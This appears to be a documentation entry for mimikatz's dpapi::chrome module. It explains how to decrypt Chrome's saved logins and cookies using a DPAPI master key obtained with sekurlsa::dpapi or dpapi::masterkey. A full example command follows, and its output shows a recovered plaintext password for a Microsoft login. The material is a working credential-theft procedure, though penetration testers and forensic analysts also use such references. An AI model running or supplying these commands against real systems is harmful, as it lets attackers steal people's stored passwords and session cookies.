chrome
dpapi::chrome dumps stored credentials and cookies from Chrome. It has the following command line arguments:
  • in: the path to the Chrome database to read: C:\Users\<UserName>\AppData\Local\Google\Chrome\User Data\Default\Login Data for the saved logins, or C:\Users\<UserName>\AppData\Local\Google\Chrome\User Data\Default\Cookies for the cookies
  • key: the key value output by dpapi::masterkey /in:"C:\Users\<UserName>\AppData\Roaming\Microsoft\Protect\SID\MasterKey_ID" /rpc. It is useful for offline dumping of Chrome. CoreSecurity has published an excellent guide on how this can be accomplished offline.
  • state: TODO
  • encryptedkey: TODO
  • /password: the user's password to use for decryption
  • /masterkey: the masterkey to use for decryption. It can be obtained through sekurlsa::dpapi.
  • /unprotect: display the decryption results on screen
mimikatz # dpapi::chrome /in:"C:\Users\m3g9tr0n\AppData\Local\Google\Chrome\User Data\Default\Login Data" /masterkey:3f7a17dd6658319fcd4b832afc20ac7dacbb9d7cd668527c71f98e90464624634c614a7923a3beb23c4e24dd718f2a8e838ce72935fb29f11507affb543a53c3
> Encrypted Key found in local state file
> Encrypted Key seems to be protected by DPAPI
* volatile cache: GUID:{5c22983f-77ee-41e4-9086-8073d664e417};KeyHash:850247e2dd89c50536c05bdcee1a56c395e752cf;Key:available
* masterkey : 3f7a17dd6658319fcd4b832afc20ac7dacbb9d7cd668527c71f98e90464624634c614a7923a3beb23c4e24dd718f2a8e838ce72935fb29f11507affb543a53c3
> AES Key is: fd0635bf2e19d76231f649f48f4a90df3de80d3f83aa5ad016b3155fdab37fa2

URL : https://login.live.com/ ( https://login.live.com/login.srf )
* using BCrypt with AES-256-GCM
Password: MySecretPass